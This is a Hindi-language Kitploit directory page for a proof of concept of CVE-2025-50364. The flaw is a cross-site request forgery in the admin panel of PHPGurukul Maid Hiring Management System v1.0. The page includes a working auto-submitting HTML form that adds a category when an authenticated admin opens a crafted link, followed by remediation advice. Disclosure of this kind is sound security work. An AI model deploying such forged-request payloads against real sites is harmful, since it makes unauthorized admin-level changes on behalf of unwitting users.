Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

PHPGurukul Maid Hiring Management System v1.0 में CSRF भेद्यता के लिए प्रमाण-अवधारणा, जो दुर्भावनापूर्ण अनुरोधों के माध्यम से अनधिकृत श्रेणी निर्माण प्रदर्शित करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परियोजना का नाम और रेपो URL: नौकरानी किराया प्रबंधन प्रणाली PHP और MySQL का उपयोग करके

भेद्यता प्रकार: क्लाइंट साइड अनुरोध जालसाजी

प्रभावित संस्करण: v1.0

💣भेद्यता विवरण: PHPGurukul किराया प्रबंधन प्रणाली के एडमिन पैनल में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है, जो एक हमलावर को एक प्रमाणित व्यवस्थापक को दुर्भावनापूर्ण साइट पर जाने के लिए धोखा देकर मनमानी किराया श्रेणियां जोड़ने की अनुमति देती है। इससे डेटा प्रदूषण और अनधिकृत व्यवस्थापक-स्तर परिवर्तन हो सकते हैं।

👩‍💻प्रभाव: अनधिकृत श्रेणी निर्माण

🛜प्रमाण-अवधारणा (PoC)

  1. एक श्रेणी जोड़ने की कार्यक्षमता थी जहां केवल प्रमाणित व्यवस्थापक ही श्रेणी जोड़ सकता था। 1
  2. एंडपॉइंट /admin/add-category.php पर POST अनुरोध भेजने के लिए HTML कोड CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. HTML कोड का उपयोग करें और एक दुर्भावनापूर्ण URL बनाएं। 3
  2. व्यवस्थापक द्वारा लिंक पर क्लिक करने के बाद, नई श्रेणी जोड़ दी जाएगी। 4 5

सिफारिश: एडमिन फॉर्म में CSRF टोकन लागू करें, SameSite कुकीज़ लागू करें, और अनधिकृत कार्रवाइयों को रोकने के लिए अनुरोध मूल को मान्य करें।

टूल डाउनलोड करें